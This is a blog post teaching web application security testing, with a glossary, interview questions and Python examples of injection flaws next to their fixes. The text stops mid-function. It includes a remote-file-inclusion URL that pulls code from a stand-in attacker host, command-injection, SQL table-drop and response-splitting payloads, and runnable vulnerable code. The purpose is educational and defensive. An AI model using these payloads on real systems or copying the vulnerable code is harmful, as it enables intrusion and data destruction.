Wednesday, 9 March 2011

Web Application Penetration Testing


A web application (webapp) is an application that is accessed through a web browser over a network such as the Internet or an intranet. It is software written in browser-supported languages (HTML, JavaScript, Java applets and so on) that relies on a common web browser to render and run the application.
Two commonly repeated rules of thumb:
• a small fraction of bugs (programming errors), usually quoted as 1%, causes about 50% of security problems
• if configured right, information systems can survive almost all attacks
Application security is concerned with finding vulnerabilities in an application and ensuring that secure practices are followed to remove these flaws at every stage of the SDLC.
 
 
What are the threats?
• denial-of-service
• unauthorized use or misuse of computing  systems
• loss/alteration/compromise of data or software
• monetary/financial loss
• loss or endangerment of human life
• loss of trust in computer/network system
• loss of public confidence
 
 
Who are the threats?
• Competitors
• Hackers
• Corporate Spies
• Disgruntled Employees
• Careless Employees
• Professional Thieves
• Visitors
 
Security Testing:
To find vulnerabilities in web applications we first need a way to identify them.
Methods:
Code audit (labour-intensive), also called white-box testing
Testing (manual or automated), also called black-box testing
Manual testing: a human attacks the web application using experience, knowledge and tools
Automated testing: a human runs an automated vulnerability scanner against the web application
Security testing shows the extent to which a system or application can protect itself from unauthorized access, hacking, cracking, code damage, and so on. It aims to:
• verify and validate that applications meet their security requirements
• identify security vulnerabilities of applications in the given environment
This type of testing needs sophisticated testing techniques.
 

Virus,Trojan,Worm

Virus: A computer virus is a small program written to alter the way a computer operates, without the permission or knowledge of the user. A virus must meet two criteria:

  • It must execute itself. It often places its own code in the path of execution of another program.
  • It must replicate itself. For example, it may replace other executable files with a copy of the virus-infected file. Viruses can infect desktop computers and network servers alike.

Some viruses are programmed to damage the computer by damaging programs, deleting files, or reformatting the hard disk. Others are not designed to do any damage but simply replicate themselves and make their presence known by presenting text, video, or audio messages. Even these "benign" viruses create problems for the user: they take up memory used by legitimate programs, which causes erratic behaviour and system crashes, and many are bug-ridden, so their own bugs can lead to crashes and data loss.

Five recognized types of viruses:

File infector viruses: File infector viruses infect program files. These viruses normally infect executable code, such as .com and .exe files. They can infect other files when an infected program is run from a floppy, the hard drive, or the network. Many of these viruses are memory resident. After memory becomes infected, any non-infected executable that runs becomes infected. Examples of known file infector viruses include Jerusalem and Cascade.

Boot sector viruses: Boot sector viruses infect the system area of a disk; that is, the boot record on floppy disks and hard disks. All floppy disks and hard disks (including disks containing only data) contain a small program in the boot record that is run when the computer starts up. Boot sector viruses attach themselves to this part of the disk and activate when the user attempts to start up from the infected disk. These viruses are always memory resident in nature. Most were written for DOS, but all PCs, regardless of the operating system, are potential targets of this type of virus. All that is required to become infected is to attempt to start up your computer with an infected floppy disk. Thereafter, while the virus remains in memory, all floppy disks that are not write protected will become infected when they are accessed. Examples of boot sector viruses are Form, Disk Killer, Michelangelo, and Stoned.

Master boot record viruses: Master boot record viruses are memory-resident viruses that infect disks in the same manner as boot sector viruses. The difference between these two virus types is where the viral code is located. Master boot record infectors normally save a legitimate copy of the master boot record in a different location. Windows NT computers that become infected by either boot sector viruses or master boot record viruses will not boot. This is due to the difference in how the operating system accesses its boot information, as compared to Windows 98/Me. If your Windows NT system is formatted with FAT partitions you can usually remove the virus by booting to DOS and using antivirus software. If the boot partition is NTFS, the system must be recovered by using the three Windows NT Setup disks. Examples of master boot record infectors are NYB, AntiExe, and Unashamed.

Multipartite viruses: Multipartite (also known as polypartite) viruses infect both boot records and program files. These are particularly difficult to repair. If the boot area is cleaned but the files are not, the boot area will be reinfected. The same holds true for cleaning infected files: if the virus is not removed from the boot area, any files that you have cleaned will be reinfected. Examples of multipartite viruses include One_Half, Emperor, Anthrax and Tequila.

Macro viruses:These types of viruses infect data files. They are the most common and have cost corporations the most money and time trying to repair. With the advent of Visual Basic in Microsoft's Office 97, a macro virus can be written that not only infects data files, but also can infect other files as well. Macro viruses infect Microsoft Office Word, Excel, PowerPoint and Access files. Newer strains are now turning up in other programs as well. All of these viruses use another program's internal programming language, which was created to allow users to automate certain tasks within that program. Because of the ease with which these viruses can be created, there are now thousands of them in circulation. Examples of macro viruses include W97M.Melissa, WM.NiceDay and W97M.Groov.

Trojan horses: These are impostors: files that claim to be something desirable but are in fact malicious. A very important distinction between Trojan horse programs and true viruses is that Trojans do not replicate themselves. Trojan horses contain malicious code that, when triggered, causes loss or even theft of data. For a Trojan horse to spread, you must invite it onto your computer, for example by opening an email attachment or by downloading and running a file from the Internet. Trojan.Vundo is a Trojan horse.

Worm: Worms are programs that replicate themselves from system to system without the use of a host file. This is in contrast to viruses, which require the spreading of an infected host file. Although worms generally exist inside other files, often Word or Excel documents, there is a difference between how worms and viruses use the host file. Usually the worm will release a document that already has the "worm" macro inside it. The entire document travels from computer to computer, so the entire document should be considered the worm. W32.Mydoom.AX@mm is an example of a worm.

Security/Penetration Testing Interview Questions

  • What types of security testing have you performed?
  • What types of web security testing problems do you know?
  • Please classify vulnerabilities that you know.
  • What are two common techniques used to protect a password file?
  • What is integer overflow?
  • What is your understanding of root causes of vulnerabilities?
  • What is ISO 17799?
  • Can you describe security defect prevention?
  • List and briefly define three classes of intruders.
  • What are three benefits that can be provided by an intrusion detection system?
  • What services are provided by the SSL Record Protocol?
  • Why do we need to validate user input for length and characters?
  • Why do we need to keep track of individual users and their authentication?
  • What is runtime inspection?
  • Describe, with examples, fuzzer and sniffer tools.
  • Define buffer overflows.
  • What are format string vulnerabilities?
  • What is SQL injection?
  • Provide example of command injection.
  • Provide example of broken access control.
  • List and briefly define the parameters that define an SSL session state.
  • List and briefly define the parameters that define an SSL session connection.
  • Why do we need port scanning?
  • How to use an interactive proxy and a set of fuzz strings to manually test the application’s handling of data?
  • What is cookie gathering?
  • What is a honeypot?
  • What is a phishing attack?
  • What is a dual signature and what is its purpose?
  • How can you ensure that all input fields are properly validated to prevent code injection attacks?
  • What tools can you use to validate the strength of SID (session ID)?
  • What is file enumeration?
  • What steps are involved in the SSL Record Protocol transmission?
  • What are hidden fields in HTTP?
  • What protocols comprise SSL?
  • How to implement (create) a custom fuzz utility and test it against your application?
  • Describe SOAP and WSDL.
  • List and briefly define the principal categories of SET participants.
  • How to test a scriptable ActiveX object?
  • What is the difference between statistical anomaly detection and rule-based intrusion detection?
  • What metrics are useful for profile-based intrusion detection?
  • What is the difference between rule-based anomaly detection and rule-based penetration identification?
  • What is a salt in the context of UNIX password management?
  • List and briefly define four techniques used to avoid guessable passwords.
  • What is the difference between an SSL connection and an SSL session?
  • List and briefly define Acronyms and Abbreviations Related to Software security
  • Write an example of misusing strcpy() in C and C++ in such a way that a buffer overflow condition exists as a bug
  • Why do we use a firewall for security when we have facilities like access lists on routers?
  • What are the most important steps you would recommend for securing a new web server? Web application?
  • You have been asked to review the source code for a compiled script that is being used to validate logon credentials for a web application. The file is called "logon_validate" and a typical logon request looks like this -
  • If you were not using Apache as the reverse proxy, what Microsoft application/tool could you use to mitigate this attack?
  • What do you see as challenges to successfully deploying/monitoring web intrusion detection?
  • What online resources do you use to keep abreast of web security issues? Can you give an example of a recent web security vulnerability or threat?
  • What does this log entry indicate? How could you identify what the contents are of the "hacked.htm" file that the attacker is trying to upload?
  • What are some examples of how you would attempt to gain access?
  • What application generated the log file entry below? What type of attack is this? Assuming the index.php program is vulnerable, was this attack successful?
  • One of your web servers is logging multiple requests similar to the following:
  • What is your definition of the term "Cross-Site Scripting"? What is the potential impact to servers and clients?
  • What do you see as the most critical and current threats affecting Internet-accessible websites?
  • What is a firewall?
  • Describe how to manage a firewall.
  • What is a Denial of Service attack?
  • What is a “spoofed” packet?
  • What is a SYN Flood?
  • What do you do if you are a victim of a DoS?
  • What is GPG/PGP?
  • What is SSH?
  • What is SSL? How do you create certificates?
  • What would you do if you discovered a UNIX or network device on your network has been compromised?
  • What would you do if you discovered a Windows system on your network has been compromised?
  • What is DNS Hijacking?
  • What is a log host?
  • What is IDS or IDP, and can you give me an example of one?
  • Why are proxy servers useful?
  • What is web caching?
  • What are the most important steps you would recommend for securing a new web server?

    The most important steps for securing a new web server:
    1. Update/patch the web server software.
    2. Minimize server functionality and disable modules that are not needed.
    3. Remove default scripts and sample data.
    4. Increase logging verbosity.
    5. Tighten file ownership and permissions.

    A second, Windows/IIS-flavoured answer to the same question:

    • Minimize rights.
    • Update permissions.
    • Delete default data and scripts.
    • Use a software firewall.
    • Enable and use IIS logging.
    • Back up regularly.
    • Keep Windows and the installed tools updated.


Important Security Terminology

Abuse of Functionality: An attack technique that uses the features and functionality of a web site to consume, defraud, or circumvent the site’s access controls. See also “Denial of Service”.
ActiveX controls: A program, called a “control”, developed using ActiveX technologies. ActiveX controls can be downloaded and executed within technology-enabled Web browsers. ActiveX is a set of rules for how applications should share information. ActiveX controls can be developed in C, C++, Visual Basic, and Java. See also “Java”, “Java Applets”, “JavaScript”, “Web Browser”.
AJAX: AJAX stands for Asynchronous JavaScript and XML. This browser-based technology allows a website to perform additional resource requests without refreshing the user's page, by using the XMLHttpRequest JavaScript object.
Anti-Automation: Security measure that prevents automated programs from exercising web site functionality by administering the Turing Test to a user, which only a human could pass. See also “Visual Verification”.
Application Server: A software server, normally using HTTP, which has the ability to execute dynamic web applications. Also known a middleware, this piece of software is normally installed on or near the web server where it can be called upon. See also “Web Application”, “Web Server”.
Authentication: The process of verifying the identity or location of a user, service or application. Authentication is performed using at least one of three mechanisms: “something you have”, “something you know” or “something you are”. The authenticating application may provide different services based on the location, access method, time of day, etc. See also “Insufficient Authentication”.
Authorization: The determination of what resources a user, service or application has permission to access. Accessible resources can be URL’s, files, directories, servlets, databases, execution paths, etc. See also “Insufficient Authorization”.
Basic Authentication: A simple form of client-side authentication supported in HTTP. The HTTP client sends a request header to the web server containing a Base64-encoded username and password. If the username/password combination is valid, the web server grants the client access to the requested resource. Base64 is an encoding, not encryption: the credentials are recoverable by anyone who can read the request, so Basic Authentication is only acceptable over TLS. See also “Authentication”, “Insufficient Authentication”.
Brute Force: An automated process of trial and error used to guess the “secret” protecting a system. Examples of these secrets include usernames, passwords or cryptographic keys. See also “Authentication”, “Insufficient Authentication”, “Password Recover System”, “Weak Password Recovery Validation”.
Buffer Overflow: An exploitation technique that alters the flow of an application by overwriting parts of memory. Buffer overflows are a common cause of malfunctioning software. If the data written into a buffer exceeds its size, adjacent memory is corrupted and normally produces a fault. An attacker may be able to use a buffer overflow to alter an application's process flow: overfilling the buffer and overwriting saved return addresses or other control data on the stack can be used to execute attacker-supplied code or arbitrary operating-system commands.
CGI Scanner: Automated security program that searches for well-known vulnerabilities in web servers and off-the-shelf web application software. CGI scanners are often not very “stateful” in their analysis and only test a series of HTTP requests against known CGI strings. See also “Web Application Vulnerability Scanner”.
CGI Security: (Obsolete) See “Web Application Security”.
Client-Side Scripting: Web browser feature that extends the functionality and interactivity of static HyperText markup language (HTML) web pages. Examples of Client-Side Scripting languages are JavaScript, JScript and VBScript. See also “ActiveX controls”, “Java Applets”.
Common Gateway Interface: (Acronym - CGI) Programming standard for software to interface and execute applications residing on web servers. See also “Web Application”, “Application Server”, “Web Server”.
Configuration File Disclosure: (Obsolete) See “Predictable File Location”.
Content Spoofing: An attack technique used to trick a user into thinking that fake web site content is legitimate data.
Cookie: Small amount of data sent by the web server, to a web client, which can be stored and retrieved at a later time. Typically cookies are used to keep track of a user’s state as they traverse a web site. See also “Cookie Manipulation”.
Cookie Manipulation: Altering or modification of cookie values, on the client’s web browser, to exploit security issues within a web application. Attackers will normally manipulate cookie values to fraudulently authenticate themselves to a web site. This is an example of the problem of trusting the user to provide reasonable input. See also “Cookie”.
Code Injection: The general name for a family of attacks that depend on inserting code which the application then interprets. Such an attack may be performed by adding strings of characters to a cookie or to argument values in the URI. It exploits the lack of accurate input/output validation, for example:
Example 1
If a site uses the include() function on a variable sent with the GET method, and no validation is performed on it, an attacker can make the site execute code other than what the author had in mind.
The URL below displays information about how to contact the testsite company:
http://testsite.com/index.php?page=contact.php
In the altered URL below, the included code comes from http://evilsite.com/evilcode.php (remote file inclusion). The script "evilcode.php" may contain, for example, a call to phpinfo(), which is useful for gaining information about the configuration of the environment in which the web service runs.
http://testsite.com/?page=http://evilsite.com/evilcode.php
Example 2
  <?php
  // $_GET['pageid'] is concatenated straight into a shell command line, so the
  // shell interprets any ';', '|' or '$(...)' the client sends. system()
  // returns the last line of the command's output and stores its exit status
  // in $valoretorno.
  $varerror = system('cat ' . $_GET['pageid'], $valoretorno);
  echo $varerror;
  ?>
With code like this, the attack is carried out by sending a request (with Live HTTP Headers, or simply as a GET request) such as:
vulnerable.php?pageid=loquesea;ls
Here "loquesea" is just a placeholder value; ls is the command being executed, but any other command available on the server could be used in its place.
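The same flaw and its fix, as an added example in Python rather than the page's PHP (this is not the original page's code): a cat-based page viewer that hands the parameter to a shell, beside one that allow-lists the file name, confines the resolved path to a document root and runs the program with an argument list instead of a shell. It assumes a temporary directory stands in for the site's page directory and uses a constructed sample page; the function names are this example's own.

```python
import os
import re
import subprocess
import tempfile

# A temporary directory stands in for the site's page directory (assumption),
# holding one constructed sample page.
DOC_ROOT = os.path.realpath(tempfile.mkdtemp(prefix="pages_"))
with open(os.path.join(DOC_ROOT, "contact.txt"), "w") as fh:
    fh.write("contact page\n")


def vulnerable_show_page(pageid: str) -> str:
    """Equivalent of system('cat '.$_GET['pageid']): the parameter is spliced
    into a command line that a shell parses, so ';', '|', '&&' and '$(...)'
    in it are obeyed."""
    proc = subprocess.run("cat " + pageid, shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def injection_succeeds() -> bool:
    """Sends the page's pageid=<file>;<command> pattern to the vulnerable
    viewer and reports whether the appended command actually ran."""
    payload = os.path.join(DOC_ROOT, "contact.txt") + "; echo INJECTED"
    out = vulnerable_show_page(payload)
    return "contact page" in out and "INJECTED" in out


# Allow-list: a bare file name with a fixed extension, nothing else.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+\.txt")


def hardened_show_page(pageid: str) -> str:
    """Allow-list the name, resolve it under DOC_ROOT, refuse anything that
    escapes the root (symlinks included) and never involve a shell."""
    if not SAFE_NAME.fullmatch(pageid):
        raise ValueError("rejected page id: %r" % pageid)
    path = os.path.realpath(os.path.join(DOC_ROOT, pageid))
    if os.path.commonpath([DOC_ROOT, path]) != DOC_ROOT:
        raise ValueError("path escapes the document root")
    # argv list, no shell: the value can only ever be one argument to cat.
    proc = subprocess.run(["cat", path], capture_output=True, text=True,
                          check=True)
    return proc.stdout


def hardened_rejects(pageid: str) -> bool:
    """True if the hardened viewer refuses the given page id."""
    try:
        hardened_show_page(pageid)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable viewer ran the injected command:", injection_succeeds())
    print("hardened viewer serves contact.txt:",
          hardened_show_page("contact.txt").strip())
    for bad in ("contact.txt; echo INJECTED", "../../etc/passwd", "contact.txt|id"):
        print("hardened viewer rejects %r: %s" % (bad, hardened_rejects(bad)))
```

The allow-list alone already blocks the shell metacharacters and the "../" traversal; the realpath check is defence in depth against a symlink inside the page directory pointing outside it, and the argv form means that even a name that slipped past the regex could never become a second command.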
Cookie Poisoning: (Obsolete) See “Cookie Manipulation”.
Cross-Site Scripting: (Acronym – XSS) An attack technique that forces a web site to echo attacker-supplied data, which then executes as script in a victim's web browser. When a user is cross-site scripted, the attacker's script runs in the vulnerable site's origin and can reach whatever that site's own scripts can reach: cookies not marked HttpOnly, the page contents, and the ability to send requests as the user. See also “Client-Side Scripting”, “DOM Based Cross Site Scripting”.
Debug Commands: Application debugging features or commands that assist in identifying programming errors during the software development process.
Denial of Service: (Acronym – DoS) An attack technique that consumes all of a web site’s available resources with the intent of rendering legitimate use impossible. Resources include CPU time, memory utilization, bandwidth, disk space, etc. When any of these resources reach full capacity, the system will normally be inaccessible to normal user activity. See also “Abuse of Functionality”.
Directory Browsing: (Obsolete) See “Directory Indexing”.
Directory Enumeration: (Obsolete) See “Predictable File Location”.
Directory Indexing: A feature common to most popular web servers, that exposes contents of a directory when no index page is present. See also “Predictable File Location”.
Directory Traversal: A technique used to exploit web sites by accessing files and commands beyond the document root directory. Most web sites restrict user access to a specific portion of the file-system, typically called the document root directory or CGI root directory. These directories contain the files and executables intended for public use. In most cases, a user should not be able to access any files beyond this point.
DOM Based Cross Site Scripting: DOM based cross-site scripting (or "DOM based XSS" for short) is a “cross-site scripting” attack that makes use of insecure JavaScript (or, in general, client-side) programming in response pages to effectively incur an XSS condition. In DOM based XSS, the attacker affects the JavaScript execution in a target page (in the attacked domain) by providing it with data in the URL or the Referer, which the script uses insecurely. The script may apply the eval() function to the malicious data, or embed it in the DOM (thus making the browser potentially render it as JavaScript and run it). This is in contrast to "standard" XSS, where the malicious data is embedded into the page on the server side. In some cases, DOM based XSS can even be conducted in such a way that the malicious payload never reaches the server (for example when it sits in the URL fragment after "#"), which makes this attack more unobtrusive.
Encoding Attacks: An exploitation technique that aids an attack by changing the format of user-supplied data to bypass sanity checking filters. See also “Null Injection”.
Filename Manipulation: An attack technique used to exploit web sites by manipulating URL filenames to cause application errors, discover hidden content, or display the source code of an application. See also “Predictable File Location”.
Filter-Bypass Manipulation: See “Encoding Attacks”.
Forced Browsing: See “Predictable File Location”.
Form Field Manipulation: Altering or modification of HTML Form-Field input values or HTTP post-data to exploit security issues within a web application. See also “Parameter Tampering”, “Cookie Manipulation”.
Format String Attack: An exploit technique that alters the flow of an application by using string formatting library features to access other memory space.
Frame Spoofing: (Obsolete) See “Content Spoofing”.
HyperText Transfer Protocol: (Acronym – HTTP) A protocol scheme used on the World Wide Web. HTTP describes the way a web-client requests data and how a web server responds to those requests. See also “Web Server”, “Web Browser”.
HTTP Request Smuggling: HTTP Request Smuggling works by taking advantage of the discrepancies in parsing when one or more HTTP devices/entities (e.g. cache server, proxy server, web application firewall, etc.) are in the data flow between the user and the web server. HTTP Request Smuggling enables various attacks “web cache poisoning”, “session hijacking”, “cross-site scripting” as well as the ability to bypass web application firewall protection. The attacker sends multiple specially-crafted HTTP requests that cause the two attacked entities (e.g. a proxy server and a web server, or a firewall and a web server) to see two different sets of requests, allowing the hacker to smuggle a request to one device without the other device being aware of it.
HTTP Response Smuggling: HTTP response smuggling is an enhancement of the basic “HTTP response splitting” technique, which can evade anti-HTTP-response-splitting measures. HTTP response smuggling makes use of “HTTP request smuggling”-like techniques to exploit the discrepancies between what an anti-response-splitting mechanism considers to be the HTTP response stream, and the response stream as parsed by a proxy server (or a browser). So, while an anti-response-splitting mechanism may consider a particular response stream harmless (a single HTTP response), a proxy/browser may still parse it as two HTTP responses, and hence be susceptible to all the outcomes of the original HTTP response splitting technique. For example, some anti-response-splitting mechanisms used by some application engines forbid the application from inserting a header containing CR+LF into the response. Yet an attacker can force the application to insert a header containing bare CRs, thereby circumventing the defense mechanism. Some proxy servers still treat CR (alone) as a header (and response) separator, and as such the combination of web server and proxy server will still be vulnerable to an attack that may poison the proxy's cache.
HTTP Response Splitting: An HTTP response splitting attack causes the web server to send out two HTTP responses, where it typically only sends out one HTTP response (hence the name - "response splitting"). This can be described as HTTP response injection, and is typically conducted by injecting malicious data into an HTTP response header, and using CR+LF characters to shape and terminate the first response, and then completely shape and control the additional response. Having this second, "unexpected" response enables the attacker to fool a client that receives this extra response by forcing this client to first emit a second request. The client then matches the second, attacker-controlled response to the second, attacker-controlled request. The net result (looking at the second request-response pair) is that the client is forced to send an arbitrary request to the vulnerable server, and in response, the client receives an arbitrary response crafted by the attacker. This condition enables “cross-site scripting” and “cache poisoning”.
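The splitting and the smuggling entries above, as an added example (not code from the original page): a redirect whose Location header is built from an unchecked value, a minimal reader that consumes the byte stream the way a simple client or proxy would and so sees two responses, and the hardened builder that rejects CR and LF individually (bare CR included, which is the smuggling variant). The payload, the function names and the 25-byte script body are constructed for this example.

```python
CRLF = "\r\n"

# Constructed attacker value for the redirect target: it terminates the first
# response and supplies a complete second one with a 25-byte script body.
SPLIT_PAYLOAD = ("/home" + CRLF +
                 "Content-Length: 0" + CRLF + CRLF +
                 "HTTP/1.1 200 OK" + CRLF +
                 "Content-Type: text/html" + CRLF +
                 "Content-Length: 25" + CRLF + CRLF +
                 "<script>alert(1)</script>")


def build_redirect_vulnerable(target: str) -> str:
    """A naive redirect: the user-controlled target is pasted into the
    Location header without any check for CR or LF."""
    return ("HTTP/1.1 302 Found" + CRLF +
            "Location: " + target + CRLF +
            "Content-Length: 0" + CRLF + CRLF)


def check_header_value(value: str) -> str:
    """Reject CR, LF and other control characters individually, not just the
    CR+LF pair, because some intermediaries treat a bare CR as a line break.
    Apply this after any URL-decoding has already happened."""
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in value):
        raise ValueError("control character in header value")
    return value


def build_redirect_hardened(target: str) -> str:
    """Same redirect with the header value validated first."""
    return ("HTTP/1.1 302 Found" + CRLF +
            "Location: " + check_header_value(target) + CRLF +
            "Content-Length: 0" + CRLF + CRLF)


def hardened_refuses(target: str) -> bool:
    """True if the hardened builder rejects the target."""
    try:
        build_redirect_hardened(target)
    except ValueError:
        return True
    return False


def parse_responses(stream: str) -> list:
    """Minimal reader behaving like a simple client or proxy: after each
    header block it consumes Content-Length bytes of body, then expects the
    next status line. Returns one dict per response it recognises."""
    responses = []
    pos = 0
    while pos < len(stream):
        end = stream.find(CRLF + CRLF, pos)
        if end == -1:
            break
        lines = stream[pos:end].split(CRLF)
        if not lines[0].startswith("HTTP/"):
            break  # leftover bytes that are not a status line
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_start = end + len(CRLF + CRLF)
        length = int(headers.get("content-length", "0"))
        body = stream[body_start:body_start + length]
        responses.append({"status": lines[0], "headers": headers, "body": body})
        pos = body_start + length
    return responses


if __name__ == "__main__":
    for resp in parse_responses(build_redirect_vulnerable(SPLIT_PAYLOAD)):
        print(resp["status"], "|", resp["body"])
    print("hardened builder refuses payload:", hardened_refuses(SPLIT_PAYLOAD))
```

The second, attacker-authored response is what a proxy would cache for the next URL it happens to pair it with, and what a browser would render for the attacker-controlled second request described in the entry above. Modern HTTP libraries (Python's http.client among them) refuse header values containing CR or LF; check_header_value is the same rule applied explicitly.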
Information Leakage: When a web site reveals sensitive data, such as developer comments or error messages, which aids an attacker in exploiting the system. See also “Verbose Messages”.
Insufficient Authentication: When a web site permits an attacker to access sensitive content or functionality without verifying their identity. See also “Authentication”.
Insufficient Authorization: When a web site permits an attacker to access sensitive content or functionality that should require increased access control restrictions. See also “Authorization”.
Insufficient Session Expiration: When a web site permits an attacker to reuse old session credentials or session ID’s for authorization. See also “Session Replay”, “Session Credential”, “Session ID”, “Session Manipulation”.
Insufficient Process Validation: When a web site permits an attacker to bypass or circumvent the intended flow control of an application.
Java: A popular programming language developed by Sun Microsystems(tm). See also “ActiveX controls”, “Web Browser”, “JavaScript”, “Client-Side Scripting”.
Java Applets: An applet is a program written in the Java programming language that can be included in a web page. When a Java enabled web browser views a page containing an applet, the code is executed by the Java Virtual Machine (JVM). See also “Web Browser”, “Java”, “ActiveX controls”, “JavaScript”, “Client-Side Scripting”.
JavaScript: A popular web browser client-side scripting language used to create dynamic web page content. See also “ActiveX controls”, “Java Applets”, “Client-Side Scripting”.
Known CGI file: See “Predictable File Location”.
Known Directory: See “Predictable File Location”.
LDAP Injection: A technique for exploiting a web site by altering backend LDAP statements through manipulating application input, similar in method to SQL injection. See also “Parameter Tampering”, “Form Field Manipulation”.
Example 1
On a page with a user search form, the following markup collects the value and the server-side code turns it into an LDAP query against the directory:
  <label>Insert the username <input type="text" size="20" name="userName"></label>
The LDAP query is narrowed down for performance, and the underlying code for this function might be the following:
  String ldapSearchQuery = "(cn=" + userName + ")";
  System.out.println(ldapSearchQuery);
If the variable userName is not validated, LDAP injection becomes possible:
  • If the user enters “*” in the search box, the directory may return every username in the LDAP base.
  • If the user enters “jonys)(|(password=*))”, the concatenation yields (cn=jonys)(|(password=*))); directory servers that tolerate the trailing unbalanced parenthesis evaluate the injected clause, and the attacker can go on to probe jonys' password attribute with further crafted filters.
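The fix for the example above, as an added Python example (not the page's own Java code): escape the five characters that carry meaning inside an LDAP filter before concatenating, as RFC 4515 prescribes, and compare the filters the vulnerable and hardened builders produce for the page's inputs. Function names are this example's own.

```python
# Characters with special meaning inside an LDAP filter (RFC 4515, section 3)
# and their required backslash-hex escapes.
_FILTER_SPECIALS = {
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\\": r"\5c",
    "\0": r"\00",
}


def ldap_escape_filter_value(value: str) -> str:
    """Escape one assertion value for use inside an LDAP search filter, so
    that wildcards and parentheses in it are matched literally."""
    return "".join(_FILTER_SPECIALS.get(ch, ch) for ch in value)


def build_user_filter_vulnerable(user_name: str) -> str:
    """The page's concatenation, unchanged: the input becomes filter syntax."""
    return "(cn=" + user_name + ")"


def build_user_filter_hardened(user_name: str) -> str:
    """Same filter with the value escaped: '*', '(' and ')' are now data."""
    return "(cn=" + ldap_escape_filter_value(user_name) + ")"


if __name__ == "__main__":
    # The three inputs discussed above: a normal name, the wildcard, and the
    # clause-injecting payload.
    for name in ("jonys", "*", "jonys)(|(password=*))"):
        print("input     :", name)
        print("vulnerable:", build_user_filter_vulnerable(name))
        print("hardened  :", build_user_filter_hardened(name))
```

In production use the LDAP library's own escaper rather than a hand-rolled table (python-ldap ships ldap.filter.escape_filter_chars); values placed into a distinguished name need the different RFC 4514 escaping, not this one.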
Meta-Character Injection: An attack technique used to exploit web sites by sending in meta-characters, which have special meaning to a web application, as data input. Meta-characters are characters that have special meaning to programming languages, operating system commands, individual program procedures, database queries, etc. These special characters can adversely alter the behavior of a web application. See also “Null Injection”, “Parameter Tampering”, “SQL Injection”, “LDAP Injection”, “Cross-Site Scripting”.
Null Injection: An exploitation technique used to bypass sanity checking filters by adding URL encoded null-byte characters to user-supplied data. When developers create web applications in a variety of programming languages, these web applications often pass data to underlying lower level C-functions for further processing and functionality. If a user-supplied string contains a null character (\0), the web application may stop processing the string at the point of the null. Null Injection is a form of a meta-character Injection attack. See also “Encoding Attacks”, “Parameter Tampering”, “Meta Character Injection”.
OS Command Injection: See “OS Commanding”.
OS Commanding: An attack technique used to exploit web sites by executing operating-system commands through manipulating application input. See also “Parameter Tampering”, “Form Field Manipulation”.
Page Sequencing: (Obsolete) See “Insufficient Process Validation”.
Parameter Tampering: Altering or modification of the parameter name and value pairs in a URL. Also known as “URL Manipulation”. See also “Uniform Resource Locator”.
Password Recovery System: An automated process that allows a user to recover or reset his password in the event that it has been lost or forgotten. See also “Weak Password Recovery Validation”.
Predictable File Location: A technique used to access hidden web site content or functionality by making educated guesses, manually or automatically, of the names and locations of files. Predictable file locations may include directories, CGI’s, configuration files, backup files, temporary files, etc.
Secure Sockets Layer: (Acronym – SSL) An industry standard public-key protocol used to create encrypted tunnels between two network-connected devices. See also “Transport Layer Security”.
Session Credential: A string of data provided by the web server, normally stored within a cookie or URL, which identifies a user and authorizes them to perform various actions. See also “Session ID”.
Session Fixation: An attack technique that forces a user’s session credential or session ID to an explicit value. See also “Session Credential”, “Session ID”.
Session Forging: See “Session Prediction”.
Session Hi-Jacking: The result of a user’s session being compromised by an attacker. The attacker could reuse this stolen session to masquerade as the user. See also “Session Prediction”, “Session Credential”, “Session ID”.
Session ID: A string of data provided by the web server, normally stored within a cookie or URL. A Session ID tracks a user’s session, or perhaps just his current session, as he traverses the web site.
Session Manipulation: An attack technique used to hi-jack another user’s session by altering a session ID or session credential value. See also “Session Prediction”, “Session Hi-Jacking”, “Session Credential”, “Session ID”.
Session Prediction: An attack technique used to create fraudulent session credentials or guess other users’ current session IDs. If successful, an attacker could reuse this stolen session to masquerade as another user. See also “Session Credential”, “Session ID”, “Session Hi-Jacking”.
Session Replay: When a web site permits an attacker to reuse old session credentials or session ID’s for authorization. See also “Session ID”, “Session Credential”, “Insufficient Session Expiration”.
Session Tampering: See “Session Manipulation”.
SQL Injection: An attack technique used to exploit web sites by altering backend SQL statements through manipulating application input. See also “Parameter Tampering”, “Form Field Manipulation”.
Example of a vulnerable statement built by string concatenation:
statement = "SELECT * FROM users WHERE name = '" + userName + "';"
Resulting statement when userName is a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't (the supplied quote closes the string literal, and the rest of the input is parsed as further SQL):
SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';

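Added example (not part of the original glossary): the concatenated statement from the SQL Injection entry run against a constructed in-memory SQLite database, beside the parameterized form of the same query. The schema, the table contents and the function names are assumptions made for the demonstration.

```python
import sqlite3

# The input shown in the glossary entry, reproduced verbatim.
PAYLOAD = "a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't"


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: the users and userinfo tables the
    glossary's statement refers to, with one row each."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users(name TEXT); INSERT INTO users VALUES('alice');"
        "CREATE TABLE userinfo(name TEXT); INSERT INTO userinfo VALUES('alice');"
    )
    return conn


def table_exists(conn: sqlite3.Connection, table: str) -> bool:
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type='table' AND name=?", (table,)
    ).fetchone()
    return row is not None


def build_vulnerable_statement(user_name: str) -> str:
    """The glossary's concatenation: the input becomes part of the SQL text."""
    return "SELECT * FROM users WHERE name = '" + user_name + "';"


def lookup_vulnerable(conn: sqlite3.Connection, user_name: str) -> None:
    """Executes whatever the concatenation produced. executescript() is
    used because the payload turns one query into three statements."""
    conn.executescript(build_vulnerable_statement(user_name))


def lookup_safe(conn: sqlite3.Connection, user_name: str) -> list:
    """Parameterized query: the input is bound as a value and never parsed
    as SQL, so the whole payload is simply a name that matches no row."""
    return conn.execute(
        "SELECT * FROM users WHERE name = ?", (user_name,)
    ).fetchall()


def demonstrate() -> tuple:
    """Returns (rows from the safe lookup, users table present before the
    vulnerable call, users table present after it)."""
    conn = make_db()
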